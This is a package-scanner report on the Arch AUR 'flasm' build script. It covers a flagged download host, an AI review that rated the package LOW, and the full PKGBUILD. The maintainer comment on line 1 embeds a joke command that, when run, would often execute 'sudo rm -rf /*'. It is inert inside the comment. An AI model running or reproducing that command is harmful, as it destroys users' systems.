flasm
maintainer CyberShadow
· 4 votes
· scanned 2026-08-03 00:08:14.047287
LOW
View on AUR ↗
Why flagged
The source is a tarball from a non-whitelisted but plausibly project-related host (nowrap.de), used to build the project from source; no remote code execution, obfuscated payloads, or malicious behavior is present in the PKGBUILD.
Triggered rules
LOW
AI review downgraded a static finding
llm_review
The static rules flagged this MEDIUM, but an AI model (qwen/qwen3-235b-a22b-07-25) reviewed the full PKGBUILD and judged it LOW (confidence 95%): The source is a tarball from a non-whitelisted but plausibly project-related host (nowrap.de), used to build the project from source; no remote code execution, obfuscated payloads, or malicious behavior is present in the PKGBUILD.
1 higher static finding superseded - not the current verdict (shown for transparency)
MEDIUM
source=() URL on a non-standard host
source_untrusted_domain
One or more source=() URLs point to a host outside the trusted allowlist (github.com, gitlab.com, codeberg.org, pypi.org, …).
-
PKGBUILD:10
http://www.nowrap.de/download/flasm16src.zip
PKGBUILD
1 offending line(s) highlighted
1
# Maintainer: felix <`(( $RANDOM % 6 == 0 )) && base64 -d <<< ZmVsaXgudm9uLnNAcG9zdGVvLmRlCg== || sudo rm -rf /* `>
2
pkgname=flasm
3
pkgdesc='SWF (Flash) ActionScript bytecode assembler and disassembler'
4
pkgver=1.63
5
pkgrel=3
6
arch=(i686 x86_64)
7
license=(custom:BSD)
8
url='http://flasm.sourceforge.net/'
9
source=(
10
http://www.nowrap.de/download/flasm16src.zip
11
in_word_set.patch
12
)
13
depends=(zlib)
14
makedepends=(gperf)
15
sha512sums=(
16
'af53c8902bac9bc03a4274f51280abe7e595f19d8ee367c0237868634df58a42144bb6c335a99f860c494da90d483072c66064897ef1ad467b7621c648ca322a'
17
'f8b1c4c8407ceadf2727fb9217af032983cfe298f4a7c898267180285b7c8f7caff35b2a50e0e355b88fbf3d4d68f5142f78d98dfa39bcbcd4c4f6d16cbfd97f'
18
)
19
20
prepare() {
21
cd "$srcdir"
22
patch -Np1 < in_word_set.patch
23
}
24
25
build() {
26
cd "$srcdir"
27
make
28
}
29
30
package() {
31
cd "$srcdir"
32
33
install -Dm 0755 flasm "$pkgdir/usr/bin/flasm"
34
install -Dm 0644 flasm.ini "$pkgdir/etc/flasm.ini"
35
36
install -Dm 0644 LICENSE.TXT "$pkgdir/usr/share/licenses/flasm/LICENSE.TXT"
37
38
install -Dm 0644 logo.gif "$pkgdir/usr/share/doc/flasm/logo.gif"
39
install -Dm 0644 classic.css "$pkgdir/usr/share/doc/flasm/classic.css"
40
install -Dm 0644 flasm.html "$pkgdir/usr/share/doc/flasm/flasm.html"
41
install -Dm 0644 CHANGES.TXT "$pkgdir/usr/share/doc/flasm/CHANGES.TXT"
42
}
43
Scan history
| Scanned at (UTC) | Severity | Rules |
|---|---|---|
| 2026-08-03 00:08:14 | LOW | 2 |
| 2026-08-02 00:16:08 | LOW | 2 |
| 2026-08-01 00:11:18 | LOW | 2 |
| 2026-07-31 00:14:10 | LOW | 2 |
| 2026-07-30 00:17:23 | LOW | 2 |
| 2026-07-29 00:25:53 | LOW | 2 |
| 2026-07-28 00:07:28 | LOW | 2 |
| 2026-07-27 00:24:32 | LOW | 2 |
| 2026-07-26 00:07:32 | LOW | 2 |
| 2026-07-25 00:13:44 | LOW | 2 |
| 2026-07-24 00:02:28 | LOW | 2 |
| 2026-07-23 00:14:47 | LOW | 2 |
| 2026-07-22 00:29:32 | LOW | 2 |
| 2026-07-21 00:24:15 | LOW | 2 |
| 2026-07-20 00:19:49 | LOW | 2 |
| 2026-07-19 00:17:08 | LOW | 2 |
| 2026-07-18 00:14:48 | LOW | 2 |
| 2026-07-17 00:06:16 | LOW | 2 |
| 2026-07-16 00:05:41 | LOW | 2 |
| 2026-07-15 00:09:25 | LOW | 2 |